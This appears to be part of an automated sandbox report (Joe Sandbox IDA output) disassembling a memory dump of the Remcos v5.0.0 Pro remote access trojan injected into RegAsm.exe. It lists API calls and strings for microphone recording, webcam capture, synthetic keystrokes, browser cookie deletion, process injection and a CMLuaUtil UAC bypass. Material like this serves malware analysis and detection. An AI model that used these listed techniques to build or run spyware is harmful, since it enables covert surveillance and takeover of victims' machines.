                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                • Sleep.KERNEL32(00000064), ref: 00417521
                                • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                APIs
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                • API ID: CurrentProcess
                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                • API String ID: 2050909247-4242073005
                                APIs
                                • _strftime.LIBCMT ref: 00401D50
                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                • API String ID: 3809562944-243156785
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                • int.LIBCPMT ref: 00410E81
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                • String ID: ,kG$0kG
                                • API String ID: 3815856325-2015055088
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                • waveInStart.WINMM ref: 00401CFE
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID: dMG$|MG$PG
                                • API String ID: 1356121797-532278878
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                  • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                                  • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                                  • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                • TranslateMessage.USER32(?), ref: 0041D4E9
                                • DispatchMessageA.USER32 ref: 0041D4F3
                                • GetMessageA.USER32 ref: 0041D500
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • _memcmp.LIBVCRUNTIME ref: 00445423
                                • _free.LIBCMT ref: 00445494
                                • _free.LIBCMT ref: 004454AD
                                • _free.LIBCMT ref: 004454DF
                                • _free.LIBCMT ref: 004454E8
                                • _free.LIBCMT ref: 004454F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                • ExitThread.KERNEL32 ref: 004018F6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: PkG$XMG$NG$NG
                                • API String ID: 1649129571-3151166067
                                • Opcode ID: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                • Opcode Fuzzy Hash: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                                • MoveFileW.KERNEL32 ref: 00407A6A
                                • CloseHandle.KERNEL32(00000000), ref: 00407A95
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                • String ID: .part
                                • API String ID: 1303771098-3499674018
                                • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                APIs
                                • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                                • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm$zD
                                • API String ID: 2936374016-2723203690
                                • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]$xUG$TG
                                • API String ID: 3554306468-1165877943
                                • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                APIs
                                • GetConsoleCP.KERNEL32 ref: 0044B3FE
                                • __fassign.LIBCMT ref: 0044B479
                                • __fassign.LIBCMT ref: 0044B494
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                                • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: _free
                                • String ID: D[E$D[E
                                • API String ID: 269201875-3695742444
                                • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                APIs
                                • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                                  • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: CloseEnumInfoOpenQuerysend
                                • String ID: xUG$NG$NG$TG
                                • API String ID: 3114080316-2811732169
                                • Opcode ID: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                • Opcode Fuzzy Hash: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                APIs
                                  • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                                  • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                  • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                • _wcslen.LIBCMT ref: 0041B763
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                • API String ID: 37874593-122982132
                                • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                APIs
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                • API String ID: 1133728706-4073444585
                                • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                APIs
                                  • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                • _free.LIBCMT ref: 00450F48
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00450F53
                                • _free.LIBCMT ref: 00450F5E
                                • _free.LIBCMT ref: 00450FB2
                                • _free.LIBCMT ref: 00450FBD
                                • _free.LIBCMT ref: 00450FC8
                                • _free.LIBCMT ref: 00450FD3
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                • int.LIBCPMT ref: 00411183
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 004111C3
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID: (mG
                                • API String ID: 2536120697-4059303827
                                • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                APIs
                                • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                APIs
                                • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                                  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                • CoUninitialize.OLE32 ref: 00407629
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: InitializeObjectUninitialize_wcslen
                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                • API String ID: 3851391207-1839356972
                                • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                • GetLastError.KERNEL32 ref: 0040BAE7
                                Strings
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                • UserProfile, xrefs: 0040BAAD
                                • [Chrome Cookies not found], xrefs: 0040BB01
                                • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                APIs
                                • AllocConsole.KERNEL32 ref: 0041CDA4
                                • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: Console$AllocOutputShowWindow
                                • String ID: Remcos v$5.0.0 Pro$CONOUT$
                                • API String ID: 2425139147-2278869229
                                • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                APIs
                                • __allrem.LIBCMT ref: 0043AC69
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                • __allrem.LIBCMT ref: 0043AC9C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                • __allrem.LIBCMT ref: 0043ACD1
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                APIs
                                • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: H_prologSleep
                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                • API String ID: 3469354165-3054508432
                                • Opcode ID: 6f157006139ccf4b8d86a432b5633ede6fd06edeca8eb9c0ae1caa95c8564102
                                • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                • Opcode Fuzzy Hash: 6f157006139ccf4b8d86a432b5633ede6fd06edeca8eb9c0ae1caa95c8564102
                                • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                APIs
                                  • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
